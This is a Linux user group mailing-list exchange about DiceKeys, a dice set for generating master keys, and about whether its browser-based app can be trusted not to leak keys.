[GTALUG] Dice Keys

[Lennart Sorensen]

On Fri, Aug 28, 2020 at 11:15:00AM -0400, Christopher Browne via talk wrote:
> Here's a cool thing I saw recently...
> 
> https://www.schneier.com/blog/archives/2020/08/dicekeys.html

The comments are certainly fun to read.

> The intention of this parallels the various Bitcoin "Solid Steel Passphrase
> Wallet" items that were popular a year or so ago
> (See https://www.toughgadget.com/bitcoin-crypto-metal-recovery-seed-wallets/,
> https://www.buybitcoinworldwide.com/wallets/steel/ )
> 
> It's a case for a set of 25 dice that looks like a Boggle game set; it will
> generate and "record" what ought to be a Sooper Seekrut key as would be
> used for things like:
>  - master key for password manager
>  - U2F key for 2 Factor Authentication
>  - Secret key for cryptocurrency wallet
> 
> By being a set of dice with a nice plastic box to hold them securely, this
> is not vulnerable to various threats common to electronic devices:
>  - EMP (for those highly worried about nuclear devices)
>  - Water damage
> 
> Of course, if all your disk drives get toasted, there might not be any data
> left to decrypt or systems to connect to.  And plastic will melt away or
> burn when exposed to fire...
> 
> But it's pretty cool, I'm tempted to grab a set.
> 
> There's a web app: https://dicekeys.app/
> 
> It appears that this application, embedded in a single JavaScript file,
> runs locally, inside your browser, so that usual criticisms about it being
> a giant security vulnerability of sharing your key with their web site
> seems like it mightn't apply.  How to confirm in an authoritative way that
> nothing is *actually* shared seems like the fun security question.

I guess if you load the page, go offline, do the thing, close the browser,
wipe any caches and other things from it, then maybe you could trust it?
Or save a copy locally, read all the code and only run your verified
local copy?

-- 
Len Sorensen